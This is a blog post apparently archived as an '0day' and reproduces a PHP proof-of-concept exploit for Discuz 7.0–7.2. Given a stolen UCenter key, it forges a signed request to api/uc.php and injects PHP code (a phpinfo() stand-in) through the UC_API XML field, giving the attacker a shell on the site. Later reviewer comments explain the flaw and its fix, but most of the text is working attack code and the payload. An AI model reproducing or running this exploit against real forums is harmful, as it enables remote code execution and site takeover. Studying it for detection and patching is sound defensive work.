dz~~~~马后炮

2010, November 4, 1:39 PM. oday收藏
Submitted by admin

by:xhm1n9

#!/usr/bin/php
<?php
// Entry script of a 2010 proof-of-concept; the banner below names Discuz 7.0-7.2 as the
// affected versions. Reviewer notes (defensive reading):
//  - Nothing here works without the second CLI argument, the UCenter key (uc_key). The
//    key is the only credential the request carries, so for the endpoint addressed below
//    it is effectively a password and should be stored and rotated like one.
//  - The request is a single POST to api/uc.php carrying a signed "code" query parameter
//    and an XML body; see send() for the fixed headers that are visible in access logs.
print_r('
+-------------------------------------------------------------------------------------------+
2010.2.6
discuz 7.0-7.2 get shell
exploit by xhming
site: http://hi.baidu.com/mr_xhming
+-------------------------------------------------------------------------------------------+
');
// Two positional arguments are required (host, uc_key); otherwise print usage and stop.
if ($argc < 3) {
        print_r('
+-------------------------------------------------------------------------------------------+
error:php xxxx.com uc_ke
+-------------------------------------------------------------------------------------------+
');
        exit;
}

// 7 == E_ERROR | E_WARNING | E_PARSE; notices are not reported.
error_reporting(7);
// Remove the execution time limit.
ini_set('max_execution_time', 0);

$host = $argv[1];
$uc_key = $argv[2];
// Parameters that get signed with uc_key: the current Unix time and the action name.
$k=time();
$get=array('time'=>$k,'action'=>'updateapps');
$code=encode_arr($get,$uc_key);

// XML body of the request. The UC_API item starts with a quote, a closing parenthesis and
// a semicolon, followed by a phpinfo() call and a comment marker.
// NOTE(review): this shape suggests the receiving code stores the UC_API value inside a
// single-quoted PHP string without escaping it; the server side is not shown on this page,
// so confirm against the installed api/uc.php. The corresponding fix is to validate the
// value as a URL and escape it before it is written anywhere that is later parsed as PHP.
// The trailing "//插入的内容" ("inserted content") on that line sits inside the heredoc and
// is therefore part of the bytes sent, not a PHP comment.
$cmd = <<<xhming
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">');phpinfo();//</item>                          //插入的内容
<item id="bb">ffaaa</item>
</root>
xhming;

send($cmd);
       
/**
 * Sends $cmd as the body of one raw HTTP/1.1 POST and returns whatever the peer sends back.
 *
 * Reads the globals $host (connection target and Host header) and $code (the signed token
 * placed in the query string). The connection is plain TCP to port 80.
 *
 * Log-review notes taken from the literals below: the request line targets
 * ".../api/uc.php?code=<token>", the Content-Type is text/xml, and the User-Agent is the
 * fixed string "Apache XML RPC 3.0 (Jakarta Commons httpclient Transport)".
 *
 * @param string $cmd Request body; its byte length becomes Content-Length.
 * @return string Raw response (status line, headers and body), or '' if nothing was read.
 */
function send($cmd)
{
        global $host, $code;

        $message = "POST "."/dz7.2/api/uc.php?code=$code HTTP/1.1\r\n";       // author's note: the path is hard-coded; adjust as needed
        $message .= "Content-Type: text/xml\r\n";
        $message .= "User-Agent: Apache XML RPC 3.0 (Jakarta Commons httpclient Transport)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
        $message .= $cmd;
       
        // NOTE(review): the fsockopen() result is used without a failure check and the
        // socket is never closed explicitly.
        $fp = fsockopen($host, 80);
        fputs($fp, $message);
       
        $resp = '';

        // Read in 1 KiB chunks until end-of-file is reported on the socket.
        while ($fp && !feof($fp))
                $resp .= fread($fp, 1024);
       
        return $resp;
}

/**
 * Flattens an associative array into "&key=value&key=value" form and encodes the result
 * with _authcode() in ENCODE mode under $uc_key.
 *
 * Keys and values are concatenated as-is; no URL-encoding is applied before encoding.
 *
 * @param array  $get    Parameter map to serialise.
 * @param string $uc_key Shared key handed to _authcode().
 * @return string Encoded token as returned by _authcode().
 */
function encode_arr($get,$uc_key) {
    $pairs = '';
    foreach (array_keys($get) as $name) {
        // Every pair, including the first, is prefixed with '&'.
        $pairs .= "&{$name}={$get[$name]}";
    }

    return _authcode($pairs, 'ENCODE', $uc_key);
}

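/**
 * Symmetric token encoder/decoder driven by a shared key.
 *
 * Layout of the plaintext before encryption (ENCODE):
 *   10 decimal digits  expiry as a Unix time, or all zeros for "never expires"
 *   16 hex characters  first half of md5(payload . keyb), used as the integrity check
 *   payload            the caller's string
 * The plaintext is XORed with an RC4 keystream (key schedule and output loop below), then
 * base64-encoded with '=' padding stripped and prefixed with a 4-character per-message salt.
 *
 * Security review notes:
 *  - All keys come from unsalted MD5 of the shared key, and the integrity check is a
 *    truncated MD5 rather than an HMAC. It covers the payload only, not the expiry field.
 *    Treat this format as legacy; a leaked key lets anyone produce valid tokens.
 *  - DECODE originally compared the expiry and the check value with loose '=='. This
 *    version requires the expiry to be exactly ten ASCII digits and compares the check
 *    value with hash_equals(), so malformed input is rejected with '' instead of being
 *    coerced (or raising a TypeError on PHP 8), and hex strings that merely look like
 *    equal numbers no longer match.
 *  - The ENCODE output format is unchanged.
 *
 * @param string $string    Payload to encode, or token to decode.
 * @param string $operation 'DECODE' (default) or anything else for encode.
 * @param string $key       Shared key; when empty the UC_KEY constant is used, which
 *                          is not defined in this file.
 * @param int    $expiry    Lifetime in seconds for ENCODE; 0 means no expiry.
 * @return string Token (ENCODE), payload (DECODE), or '' when a token is malformed,
 *                expired or fails the integrity check.
 */
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $decoding = ($operation == 'DECODE');

    // Key material: keya feeds the cipher key, keyb feeds the integrity check.
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));

    // Per-message salt: read from the token when decoding, derived from microtime() otherwise.
    if ($ckey_length) {
        $keyc = $decoding
            ? (string) substr($string, 0, $ckey_length)
            : substr(md5(microtime()), -$ckey_length);
    } else {
        $keyc = '';
    }

    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);

    if ($decoding) {
        $string = base64_decode((string) substr($string, $ckey_length));
    } else {
        $string = sprintf('%010d', $expiry ? $expiry + time() : 0)
            .substr(md5($string.$keyb), 0, 16)
            .$string;
    }
    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

    // Repeat the cipher key to 256 bytes.
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

    // RC4 key schedule.
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    // RC4 keystream XORed over the input, byte by byte.
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if (!$decoding) {
        return $keyc.str_replace('=', '', base64_encode($result));
    }

    // Header is 10 + 16 bytes; anything shorter cannot be a valid token.
    if (strlen($result) < 26) {
        return '';
    }

    $expires = substr($result, 0, 10);
    $check = substr($result, 10, 16);
    $payload = (string) substr($result, 26);

    // The encoder always writes ten decimal digits; reject everything else outright.
    if (strspn($expires, '0123456789') !== 10) {
        return '';
    }

    $expires = (int) $expires;
    if ($expires !== 0 && $expires - time() <= 0) {
        return '';
    }

    // String-safe, constant-time comparison of the integrity check.
    if (!hash_equals(substr(md5($payload.$keyb), 0, 16), $check)) {
        return '';
    }

    return $payload;
}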

?>

 

Tags: discuz
